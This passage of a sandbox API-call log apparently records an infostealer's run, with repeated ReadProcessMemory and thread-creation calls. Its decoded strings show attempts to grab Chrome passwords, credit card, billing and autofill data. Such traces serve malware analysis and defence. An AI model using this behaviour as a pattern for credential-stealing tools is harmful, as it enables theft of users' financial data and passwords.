0x3234baf0 [0180.353] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32803d10, cbMultiByte=-1, lpWideCharStr=0x3234baf0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0180.354] SetEvent (hEvent=0x1b4) returned 1 [0180.358] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e71ed0 | out: hHeap=0x2150000) returned 1 [0180.358] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e71f60 | out: hHeap=0x2150000) returned 1 [0180.358] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32803d10 | out: hHeap=0x2150000) returned 1 [0180.358] GetTickCount () returned 0x2081a83 [0180.358] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e70500 [0180.358] GetTickCount () returned 0x2081a83 [0180.358] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x3234b7f0 [0180.358] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x111a60, lpParameter=0x32e64ef0, dwCreationFlags=0x0, lpThreadId=0x87fd8c | out: lpThreadId=0x87fd8c*=0xd60) returned 0x6d8 [0180.360] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x3234b7f0 | out: hHeap=0x2150000) returned 1 [0180.360] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0180.366] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0180.384] GetTickCount () returned 0x2082329 [0180.384] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64fb0 [0180.384] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x102 [0180.384] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e724d0 [0180.385] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e72560 [0180.385] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x400) returned 0x32e71ed0 [0180.385] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110068, lpBuffer=0x87fcd8, nSize=0x38, lpNumberOfBytesRead=0x87fc58 | out: lpBuffer=0x87fcd8*, lpNumberOfBytesRead=0x87fc58*=0x38) returned 1 [0180.385] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x61f460, lpBuffer=0x32e72560, nSize=0x7f, lpNumberOfBytesRead=0x87fc58 | out: lpBuffer=0x32e72560*, lpNumberOfBytesRead=0x87fc58*=0x7f) returned 1 [0180.386] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32e72560, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5 [0180.386] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x3234b870 [0180.386] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32e72560, cbMultiByte=-1, lpWideCharStr=0x3234b870, cchWideChar=5 | out: lpWideCharStr="DPST") returned 5 [0180.386] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x613890, lpBuffer=0x32e71ed0, nSize=0x3ff, lpNumberOfBytesRead=0x87fc58 | out: lpBuffer=0x32e71ed0*, lpNumberOfBytesRead=0x87fc58*=0x3ff) returned 1 [0180.386] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32e71ed0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 34 [0180.386] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x50) returned 0x32e722e0 [0180.386] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32e71ed0, cbMultiByte=-1, lpWideCharStr=0x32e722e0, cchWideChar=34 | out: lpWideCharStr="Failed to grab credit card data: ") returned 34 [0180.386] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x61f360, lpBuffer=0x32e724d0, nSize=0x7f, lpNumberOfBytesRead=0x87fc58 | out: lpBuffer=0x32e724d0*, lpNumberOfBytesRead=0x87fc58*=0x7f) returned 1 [0180.386] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32e724d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 1 [0180.386] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x3234bbd0 [0180.387] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32e724d0, cbMultiByte=-1, lpWideCharStr=0x3234bbd0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0180.387] SetEvent (hEvent=0x1b4) returned 1 [0180.391] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e72560 | out: hHeap=0x2150000) returned 1 [0180.391] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e71ed0 | out: hHeap=0x2150000) returned 1 [0180.391] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e724d0 | out: hHeap=0x2150000) returned 1 [0180.391] GetTickCount () returned 0x2082329 [0180.391] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e70920 [0180.391] GetTickCount () returned 0x2082329 [0180.391] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x3234b930 [0180.392] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x111a60, lpParameter=0x32e64fb0, dwCreationFlags=0x0, lpThreadId=0x87fd8c | out: lpThreadId=0x87fd8c*=0x7dc) returned 0x6f0 [0180.392] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x3234b930 | out: hHeap=0x2150000) returned 1 [0180.393] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0180.397] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0180.413] GetTickCount () returned 0x2082bde [0180.413] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e65130 [0180.413] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x102 [0180.413] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e71ed0 [0180.413] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e71f60 [0180.414] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x400) returned 0x32e652b0 [0180.414] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110068, lpBuffer=0x87fcd8, nSize=0x38, lpNumberOfBytesRead=0x87fc58 | out: lpBuffer=0x87fcd8*, lpNumberOfBytesRead=0x87fc58*=0x38) returned 1 [0180.414] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x61f400, lpBuffer=0x32e71f60, nSize=0x7f, lpNumberOfBytesRead=0x87fc58 | out: lpBuffer=0x32e71f60*, lpNumberOfBytesRead=0x87fc58*=0x7f) returned 1 [0180.414] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32e71f60, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5 [0180.414] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x3234bb10 [0180.414] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32e71f60, cbMultiByte=-1, lpWideCharStr=0x3234bb10, cchWideChar=5 | out: lpWideCharStr="DPST") returned 5 [0180.414] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x6139e0, lpBuffer=0x32e652b0, nSize=0x3ff, lpNumberOfBytesRead=0x87fc58 | out: lpBuffer=0x32e652b0*, lpNumberOfBytesRead=0x87fc58*=0x3ff) returned 1 [0180.414] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32e652b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 35 [0180.415] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x50) returned 0x32e71ff0 [0180.415] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32e652b0, cbMultiByte=-1, lpWideCharStr=0x32e71ff0, cchWideChar=35 | out: lpWideCharStr="Failed to grab billing info data: ") returned 35 [0180.415] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x61f3f0, lpBuffer=0x32e71ed0, nSize=0x7f, lpNumberOfBytesRead=0x87fc58 | out: lpBuffer=0x32e71ed0*, lpNumberOfBytesRead=0x87fc58*=0x7f) returned 1 [0180.415] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32e71ed0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 1 [0180.415] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x3234bb30 [0180.415] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32e71ed0, cbMultiByte=-1, lpWideCharStr=0x3234bb30, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0180.415] SetEvent (hEvent=0x1b4) returned 1 [0180.440] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e71f60 | out: hHeap=0x2150000) returned 1 [0180.440] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e652b0 | out: hHeap=0x2150000) returned 1 [0180.440] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e71ed0 | out: hHeap=0x2150000) returned 1 [0180.440] GetTickCount () returned 0x2082bfe [0180.440] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e70380 [0180.440] GetTickCount () returned 0x2082bfe [0180.440] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x3234b910 [0180.440] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x111a60, lpParameter=0x32e65130, dwCreationFlags=0x0, lpThreadId=0x87fd8c | out: lpThreadId=0x87fd8c*=0xe74) returned 0x708 [0180.440] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x3234b910 | out: hHeap=0x2150000) returned 1 [0180.440] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0180.450] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0180.466] GetTickCount () returned 0x20834b3 [0180.466] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e65170 [0180.467] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x102 [0180.467] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e720f0 [0180.467] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e72180 [0180.467] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x400) returned 0x32e652b0 [0180.467] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110068, lpBuffer=0x87fcd8, nSize=0x38, lpNumberOfBytesRead=0x87fc58 | out: lpBuffer=0x87fcd8*, lpNumberOfBytesRead=0x87fc58*=0x38) returned 1 [0180.467] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x61f300, lpBuffer=0x32e72180, nSize=0x7f, lpNumberOfBytesRead=0x87fc58 | out: lpBuffer=0x32e72180*, lpNumberOfBytesRead=0x87fc58*=0x7f) returned 1 [0180.467] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32e72180, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5 [0180.467] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x3234b770 [0180.468] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32e72180, cbMultiByte=-1, lpWideCharStr=0x3234b770, cchWideChar=5 | out: lpWideCharStr="DEBG") returned 5 [0180.468] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x613b00, lpBuffer=0x32e652b0, nSize=0x3ff, lpNumberOfBytesRead=0x87fc58 | out: lpBuffer=0x32e652b0*, lpNumberOfBytesRead=0x87fc58*=0x3ff) returned 1 [0180.468] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32e652b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0180.468] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x60) returned 0x32e72210 [0180.468] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32e652b0, cbMultiByte=-1, lpWideCharStr=0x32e72210, cchWideChar=45 | out: lpWideCharStr="Grab_Passwords_Chrome(): Can't open database") returned 45 [0180.468] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x61f3b0, lpBuffer=0x32e720f0, nSize=0x7f, lpNumberOfBytesRead=0x87fc58 | out: lpBuffer=0x32e720f0*, lpNumberOfBytesRead=0x87fc58*=0x7f) returned 1 [0180.468] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32e720f0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 1 [0180.468] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x3234bb50 [0180.468] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32e720f0, cbMultiByte=-1, lpWideCharStr=0x3234bb50, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0180.469] SetEvent (hEvent=0x1b4) returned 1 [0180.470] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e72180 | out: hHeap=0x2150000) returned 1 [0180.470] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e652b0 | out: hHeap=0x2150000) returned 1 [0180.470] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e720f0 | out: hHeap=0x2150000) returned 1 [0180.470] GetTickCount () returned 0x20834b3 [0180.471] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e705f0 [0180.471] GetTickCount () returned 0x20834b3 [0180.471] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x3234b790 [0180.471] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x111a60, lpParameter=0x32e65170, dwCreationFlags=0x0, lpThreadId=0x87fd8c | out: lpThreadId=0x87fd8c*=0x720) returned 0x720 [0180.472] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x3234b790 | out: hHeap=0x2150000) returned 1 [0180.472] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0180.483] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0180.497] GetTickCount () returned 0x2083d68 [0180.498] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e651b0 [0180.498] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x102 [0180.498] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e65360 [0180.498] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e653f0 [0180.498] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x400) returned 0x32e65480 [0180.498] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110068, lpBuffer=0x87fcd8, nSize=0x38, lpNumberOfBytesRead=0x87fc58 | out: lpBuffer=0x87fcd8*, lpNumberOfBytesRead=0x87fc58*=0x38) returned 1 [0180.498] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x61f300, lpBuffer=0x32e653f0, nSize=0x7f, lpNumberOfBytesRead=0x87fc58 | out: lpBuffer=0x32e653f0*, lpNumberOfBytesRead=0x87fc58*=0x7f) returned 1 [0180.498] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32e653f0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5 [0180.499] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x3234b810 [0180.499] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32e653f0, cbMultiByte=-1, lpWideCharStr=0x3234b810, cchWideChar=5 | out: lpWideCharStr="DEBG") returned 5 [0180.499] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x615ea0, lpBuffer=0x32e65480, nSize=0x3ff, lpNumberOfBytesRead=0x87fc58 | out: lpBuffer=0x32e65480*, lpNumberOfBytesRead=0x87fc58*=0x3ff) returned 1 [0180.499] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32e65480, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 29 [0180.499] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x40) returned 0x32e72280 [0180.499] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32e65480, cbMultiByte=-1, lpWideCharStr=0x32e72280, cchWideChar=29 | out: lpWideCharStr="unable to open database file") returned 29 [0180.499] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x61f470, lpBuffer=0x32e65360, nSize=0x7f, lpNumberOfBytesRead=0x87fc58 | out: lpBuffer=0x32e65360*, lpNumberOfBytesRead=0x87fc58*=0x7f) returned 1 [0180.499] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32e65360, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 1 [0180.499] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x3234bb70 [0180.500] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32e65360, cbMultiByte=-1, lpWideCharStr=0x3234bb70, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0180.500] SetEvent (hEvent=0x1b4) returned 1 [0180.503] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e653f0 | out: hHeap=0x2150000) returned 1 [0180.503] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e65480 | out: hHeap=0x2150000) returned 1 [0180.503] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e65360 | out: hHeap=0x2150000) returned 1 [0180.503] GetTickCount () returned 0x2083d68 [0180.503] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e704d0 [0180.503] GetTickCount () returned 0x2083d68 [0180.504] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x3234bb90 [0180.504] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x111a60, lpParameter=0x32e651b0, dwCreationFlags=0x0, lpThreadId=0x87fd8c | out: lpThreadId=0x87fd8c*=0xb0) returned 0x738 [0180.505] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x3234bb90 | out: hHeap=0x2150000) returned 1 [0180.505] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0180.513] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0180.514] GetTickCount () returned 0x208460e [0180.514] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e65230 [0180.515] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x102 [0180.515] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e65510 [0180.515] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e655a0 [0180.515] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x400) returned 0x32e65630 [0180.515] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110068, lpBuffer=0x87fcd8, nSize=0x38, lpNumberOfBytesRead=0x87fc58 | out: lpBuffer=0x87fcd8*, lpNumberOfBytesRead=0x87fc58*=0x38) returned 1 [0180.515] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x61f350, lpBuffer=0x32e655a0, nSize=0x7f, lpNumberOfBytesRead=0x87fc58 | out: lpBuffer=0x32e655a0*, lpNumberOfBytesRead=0x87fc58*=0x7f) returned 1 [0180.515] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32e655a0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5 [0180.515] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x3234bd30 [0180.515] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32e655a0, cbMultiByte=-1, lpWideCharStr=0x3234bd30, cchWideChar=5 | out: lpWideCharStr="DPST") returned 5 [0180.515] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x615ca0, lpBuffer=0x32e65630, nSize=0x3ff, lpNumberOfBytesRead=0x87fc58 | out: lpBuffer=0x32e65630*, lpNumberOfBytesRead=0x87fc58*=0x3ff) returned 1 [0180.515] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32e65630, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0180.515] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x40) returned 0x32e65a40 [0180.515] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32e65630, cbMultiByte=-1, lpWideCharStr=0x32e65a40, cchWideChar=27 | out: lpWideCharStr="Failed to grab passwords: ") returned 27 [0180.516] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x61f3c0, lpBuffer=0x32e65510, nSize=0x7f, lpNumberOfBytesRead=0x87fc58 | out: lpBuffer=0x32e65510*, lpNumberOfBytesRead=0x87fc58*=0x7f) returned 1 [0180.516] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32e65510, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 1 [0180.516] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x3234bb90 [0180.516] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32e65510, cbMultiByte=-1, lpWideCharStr=0x3234bb90, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0180.516] SetEvent (hEvent=0x1b4) returned 1 [0180.519] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e655a0 | out: hHeap=0x2150000) returned 1 [0180.519] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e65630 | out: hHeap=0x2150000) returned 1 [0180.519] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e65510 | out: hHeap=0x2150000) returned 1 [0180.519] GetTickCount () returned 0x208460e [0180.520] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e70530 [0180.520] GetTickCount () returned 0x208460e [0180.520] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x3234b8d0 [0180.520] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x111a60, lpParameter=0x32e65230, dwCreationFlags=0x0, lpThreadId=0x87fd8c | out: lpThreadId=0x87fd8c*=0x1348) returned 0x750 [0180.520] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x3234b8d0 | out: hHeap=0x2150000) returned 1 [0180.520] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0180.536] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0180.551] GetTickCount () returned 0x2084ec3 [0180.551] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64af0 [0180.552] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x102 [0180.552] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e42330 [0180.552] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e41940 [0180.552] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x400) returned 0x32e65510 [0180.552] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110068, lpBuffer=0x87fcd8, nSize=0x38, lpNumberOfBytesRead=0x87fc58 | out: lpBuffer=0x87fcd8*, lpNumberOfBytesRead=0x87fc58*=0x38) returned 1 [0180.552] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x61f320, lpBuffer=0x32e41940, nSize=0x7f, lpNumberOfBytesRead=0x87fc58 | out: lpBuffer=0x32e41940*, lpNumberOfBytesRead=0x87fc58*=0x7f) returned 1 [0180.552] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32e41940, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5 [0180.552] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x3234b910 [0180.552] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32e41940, cbMultiByte=-1, lpWideCharStr=0x3234b910, cchWideChar=5 | out: lpWideCharStr="DPST") returned 5 [0180.552] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x615ca0, lpBuffer=0x32e65510, nSize=0x3ff, lpNumberOfBytesRead=0x87fc58 | out: lpBuffer=0x32e65510*, lpNumberOfBytesRead=0x87fc58*=0x3ff) returned 1 [0180.553] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32e65510, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 31 [0180.553] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x40) returned 0x32e419d0 [0180.553] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32e65510, cbMultiByte=-1, lpWideCharStr=0x32e419d0, cchWideChar=31 | out: lpWideCharStr="Failed to grab autofill data: ") returned 31 [0180.553] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x61f310, lpBuffer=0x32e42330, nSize=0x7f, lpNumberOfBytesRead=0x87fc58 | out: lpBuffer=0x32e42330*, lpNumberOfBytesRead=0x87fc58*=0x7f) returned 1 [0180.553] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32e42330, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 1 [0180.553] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x3234bbb0 [0180.553] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32e42330, cbMultiByte=-1, lpWideCharStr=0x3234bbb0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0180.554] SetEvent (hEvent=0x1b4) returned 1 [0180.559] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e41940 | out: hHeap=0x2150000) returned 1 [0180.559] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e65510 | out: hHeap=0x2150000) returned 1 [0180.559] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e42330 | out: hHeap=0x2150000) returned 1 [0180.559] GetTickCount () returned 0x2084ec3 [0180.559] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6cf30 [0180.559] GetTickCount () returned 0x2084ec3 [0180.560] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x3234b850 [0180.560] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x111a60, lpParameter=0x32e64af0, dwCreationFlags=0x0, lpThreadId=0x87fd8c | out: lpThreadId=0x87fd8c*=0x2a0) returned 0x5f4 [0180.566] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x3234b850 | out: hHeap=0x2150000) returned 1 [0180.566] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0180.589] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0180.598] GetTickCount () returned 0x2085788 [0180.598] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64b30 [0180.598] 